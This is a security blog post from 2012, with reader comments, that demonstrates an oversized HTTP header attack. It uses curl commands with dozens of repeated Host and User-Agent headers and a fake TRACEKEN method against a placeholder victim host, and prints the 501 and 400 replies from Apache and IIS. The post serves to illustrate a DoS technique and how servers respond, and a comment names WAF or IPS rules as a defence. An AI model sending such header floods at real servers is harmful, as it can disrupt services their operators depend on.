A question came up on a case where a DoS attempts were made against a webserver, & using a heavily modify http header. So I figure I would demonstrate such attack using curl.
In this case, the attacker had a valid requests, but he had a few bogus header fields. So I got creative and figure let me show you how I would conduct that attack. In this case, I wanted to flood a server with a few additional headers that would be more than the average number expected from a client's browser. It's easy to conduct this testing, via curl and the -H option
e.g
curl -v "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: www.victims.com" --request TRACEKEN www.victims.com
Since in HTTP 1/1 we can have a header of unlimited size, but it has to have a valid http.request. In the above, my request was a simple "TRACEKEN". Which was a play on the http.request.method TRACE and my first name KEN :)
Here's what my server replied upon receipt of that request;
>
< HTTP/1.1 501 Method Not Implemented
< Date: Fri, 28 Dec 2012 00:09:19 GMT
< Server: Apache
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 220
< Cneonction: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0845525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:13:11 GMT;path=/;httponly
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>501 Method Not Implemented</title>
</head><body>
<h1>Method Not Implemented</h1>
<p>TRACEKEN to /index.html not supported.<br />
</p>
</body></html>
* Connection #0 to host www.victim.com left intact
* Closing connection #0
It was smart enough to recognize TRACEKEN was not valid, but it also kicked out a error code of the 5XX series, and even gave me a list of valid request that it could take ( see the allow: and boldline)
Hmm interesting?
So if I've increase the header size to some god only knows what, the server will have to look at all of the header information in order to process
curl -v "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "User-Agent: testing" -H "Host: www.victims.com" --request TRACEK www.victims.com
And in this example, it generate a error code of 5XX ( not good )
HTTP/1.1 501 Method Not Implemented
< Date: Fri, 28 Dec 2012 00:23:46 GMT
< Server: Apache
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 218
< Cneonction: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0945525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:27:38 GMT;path=/;httponly
<
Now if I continued that line of approach & targeting, and further exceed the limits within the http header. The server now gives me a 4XX code
< HTTP/1.1 400 Bad Request
< Date: Fri, 28 Dec 2012 00:24:49 GMT
< Server: Apache
< Content-Length: 290
< nnCoection: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0945525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:28:41 GMT;path=/;httponly
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
The number of request header fields exceeds this server's limit.</p>
</body></html>
btw: I also tried that same http.request against my mail hosting outfit , and it gave me the same error code of 4XX, but when the content was reduced, it just delivered a 301 redirection.
Here's example of the webserver response ( microsoft), the same trace or traceken and a big header fields.
< HTTP/1.1 501 Not Implemented
< Content-Type: text/html
< Server: Microsoft-IIS/7.5
< Set-Cookie: .ASPXANONYMOUS=IFulQiUbzgEkAAAANmVmMzQxMjYtOWY0NS00NDI2LThjNmUtOTY1NDJmYzBlY2Fjxq6qN8WmCfVI5ORB_WjaZz3LHIU1; expires=Thu, 07-Mar-2013 11:16:48 GMT; path=/; HttpOnly
< Date: Fri, 28 Dec 2012 00:36:48 GMT
< Content-Length: 1508
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>501 - Header values specify a method that is not implemented.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>501 - Header values specify a method that is not implemented.</h2>
<h3>The page you are looking for cannot be displayed because a header value in the request does not match certain configuration settings on the Web server. For example, a request header might specify a POST to a static file that cannot be posted to, or specify a Transfer-Encoding value that cannot make use of compression.</h3>
</fieldset></div>
</div>
Happy hunting and the best of wishes for the DoS attacker and DoS defenders.
Ken Felix
Freelance Security & Network Engineer
kfelix at hyperfeed dot com
Hello , is there any method to fix this? I mean the 400 one.
ReplyDeleteI don't know what you mean by fix but to prevent this, a IPS rule or better yet a WAF would prevent oversize HTTP.headers or http.request lengths.
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteIs there any way where i can increase the header length? So that even if someone gives the long proxy greater then the size of 1024 it dosen't throw me the 400 error? Actually in my system i have a curl command which have a long proxy 'AAAAAAAAAAA' and so on. And if i am running the command with long proxy it gives me 400 error the same as above, but if i shorten the proxy and than run the command I am getting the required result. As I am trying to fix the HTTPONLY vulnerability in my system , so to cross check this our security team gave us the CURL command to cross check but with the original command they gave with the long proxy we are getting 400. I want to get the code likle 300 or 302 even with the long proxy(i;e the original command). Kindly suggest how can I do that?
ReplyDelete